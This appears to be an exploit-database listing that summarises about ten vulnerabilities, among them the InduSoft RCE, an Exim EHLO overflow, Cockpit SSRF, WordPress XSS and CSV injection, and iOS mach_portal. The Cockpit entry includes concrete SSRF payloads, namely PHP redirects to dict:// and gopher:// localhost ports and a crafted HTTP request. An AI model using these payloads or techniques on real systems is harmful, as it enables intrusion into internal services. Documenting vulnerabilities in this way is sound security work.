Explore Vulnerabilities

Explore all Exploits:

Tenable Research Advisory: Critical Schneider Electric InduSoft Web Studio and InTouch Machine Edition Vulnerability

Tenable Research has discovered a critical remote code execution vulnerability in Schneider Electric's InduSoft Web Studio and InTouch Machine Edition. The vulnerability can be exploited remotely without authentication to execute arbitrary commands on the target system. A malicious threat actor can completely compromise and gain control of the system, then use it as a pivot point for lateral movement. The proof of concept is a command that can be used to exploit the vulnerability.

CVE-2018-6789 PoC Exploit

This exploit is a proof of concept for CVE-2018-6789, a buffer overflow vulnerability in the handling of the SMTP EHLO command. The exploit sends an EHLO command with a long string of characters, which causes a buffer overflow and allows the attacker to overwrite the __malloc_hook pointer with the address of a one_gadget. This allows the attacker to execute arbitrary code on the target system.

SSRF (Server Side Request Forgery) in Cockpit 0.4.4-0.5.5 (CVE-2018-9302)

You can edit a .php file on your own server. Example of the .php file's code: <?php Header("Location: dict://127.0.0.1:3306/_0d%");?>

Request:

GET /assets/lib/fuc.js.php?url=http://myserver/redirect.php HTTP/1.1
Host: myserver
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8
referer:http://myserver/index.php

Modify the redirect.php file on the attacker's server. Example: <?php Header("Location: gopher://127.0.0.1:3306/_0d%");?>

If the curl function is available, the gopher, tftp, http, https, dict, ldap, imap, pop3, smtp and telnet protocols can be used; if not, only the http, https and ftp protocols are available for port scanning. Example: <?php Header("Location: dict://127.0.0.1:3306/");?>

If the curl function is unavailable, triggering this vulnerability requires the allow_url_fopen option to be enabled in php.ini; allow_url_fopen is enabled by default.

Easy MPEG to DVD Burner 1.7.11 SEH Local Buffer Overflow

Easy MPEG to DVD Burner 1.7.11 is vulnerable to a local buffer overflow. By supplying specially crafted input, an attacker can overwrite the SEH handler and execute arbitrary code. The vulnerability is caused by a boundary error when handling user-supplied input, specifically the username field. Supplying a long string of data as the username causes a stack-based buffer overflow that overwrites the SEH handler and allows the attacker to execute arbitrary code.

WordPress Responsive Cookie Consent 1.7 / 1.6 / 1.5 – Authenticated Persistent Cross-Site Scripting

An authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows arbitrary HTML/script code to be executed in the victim's browser when they visit the web site. An attacker can execute malicious code in a victim's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data, among others.

Mach_portal exploit

The mach_portal exploit targets a vulnerability in the ReportCrash daemon, which is responsible for making crash dumps of crashing userspace processes. It is possible to gain a reference to the task port by sending a message to ReportCrash via its exception ports (either task or host level) and then using the error path, which drops a UREF on the task and thread port arguments.

Kextd Method Exposed via MIG

If the client has UID 0 but passes an invalid client port, this code will drop a UREF on the client port and then return KERN_FAILURE. Returning KERN_FAILURE in MIG means all resources will be released, which causes the client port to be passed to mach_port_deallocate again, even though only one UREF was taken. An attacker can drop an extra UREF on any send right in kextd for which the attacker also holds a send right; this could be used to cause the name of a privileged service to be deallocated and then reused to name a port the attacker controls. Exploitation of this would be a privesc from unentitled root to root with the com.apple.rootless.kext-management and com.apple.rootless.storage.KernelExtensionManagement entitlements, which at least last time I looked was equivalent to root.

WordPress Plugin Form Maker version 1.12.20 vulnerable to Formula Injection (CSV Injection)

Custom Forms version 1.12.20 is affected by a Remote Command Execution vulnerability via CSV Injection. A public user can inject commands as part of form fields; when a user with higher privileges exports the form data as CSV and opens the file on their machine, the command is executed.

Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability via “Admin Site title” in Settings

Frog CMS 0.9.5 has a stored Cross Site Scripting vulnerability when an attacker has access to the Settings page and enters the payload via "Admin Site title" in Settings. Anyone who visits the target page will trigger the JavaScript code, including administrators, editors, developers, and guests.
